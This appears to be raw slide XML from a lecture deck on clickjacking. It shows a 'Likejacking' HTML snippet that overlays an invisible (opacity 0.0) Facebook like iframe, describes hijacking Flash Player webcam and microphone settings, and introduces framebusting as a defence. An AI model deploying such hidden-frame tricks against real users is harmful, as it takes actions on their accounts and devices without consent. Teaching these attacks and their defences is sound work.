            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>c="ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0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sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>w.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/plugins/like.php?href= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>... e&amp;amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>width=450&amp;amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action=like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>colorscheme=light&amp;amp;height=80“  style=“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>opacity:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>;”&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="570865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="468630">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;!‐‐end </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" u="sng" spc="-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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>like frame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-195" dirty="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sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code‐‐&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="62865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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62</a:t>
            </a:fld>
            <a:endParaRPr dirty="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641858" y="692911"/>
            <a:ext cx="877443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" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>display </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>created </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="110" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Likejacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1847088"/>
            <a:ext cx="5105400" cy="441426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08303" y="1840992"/>
            <a:ext cx="5118735" cy="4426585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="5118354" y="4424934"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5118354" y="1523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5116830" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1523" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4424934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3047" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="3047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5116830" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5118354" y="4424934"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="6096" y="6096"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6096" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="6096"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="6096" y="4420362"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6096" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048" y="4420362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="4420362"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="5115306" y="4420362"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3048" y="4420362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="4423410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="4423410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="4420362"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="6096" y="4426458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6096" y="4423410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048" y="4420362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3047" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096" y="4426458"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="5115306" y="6095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5111496" y="3047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="6095"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="5115306" y="4420362"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5115306" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="4420362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="4420362"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5118735" h="4426585">
                <a:moveTo>
                  <a:pt x="5115306" y="4426458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5115306" y="4420362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="4423410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111496" y="4426458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5115306" y="442645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708902" y="1776476"/>
            <a:ext cx="2513330" cy="2494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marR="88900" indent="-28575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97815" algn="l"/>
                <a:tab pos="298450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>forms of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-23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attack  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>possible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har char="•"/>
            </a:pPr>
            <a:endParaRPr sz="1850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" marR="5080" indent="-285750" algn="just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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Liking a profile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>whom  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>victim is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-29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familiar  at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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all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har char="•"/>
            </a:pPr>
            <a:endParaRPr sz="1850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" marR="318135" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
                <a:tab pos="299085" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Posting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-16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comment </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-1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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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intended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63</a:t>
            </a:fld>
            <a:endParaRPr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823720" y="921512"/>
            <a:ext cx="641096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Hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of Adobe Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>Player</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Setting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25905" y="5980429"/>
            <a:ext cx="69373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onstantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.macromedia.com/support/documentation/en/f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>lashplayer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25883" y="2075941"/>
            <a:ext cx="3855085" cy="2768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09575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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Enabling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>webcam </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-21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microphone  based on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-21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click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50">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="106680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Applications </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>running </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Adobe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Flash  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Player</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85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may</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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needs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access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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10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camera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85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1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Allow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>privacy  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>setting, </a:t>
            </a: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34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application can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>capture </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>camera </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>microphone, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>until </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>you  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>close </a:t>
            </a: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16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application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198364" y="1940051"/>
            <a:ext cx="4018026" cy="254355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64</a:t>
            </a:fld>
            <a:endParaRPr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93902" y="1406144"/>
            <a:ext cx="7235190" cy="126936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675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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Framebusting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>line </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-31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solution</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="1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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125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current</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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page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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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in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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>window,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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then</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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it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is  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>loaded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33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window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93902" y="4039615"/>
            <a:ext cx="7938134" cy="2369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392430" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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needs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105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present</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-14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each</a:t>
            </a:r>
            <a:r>
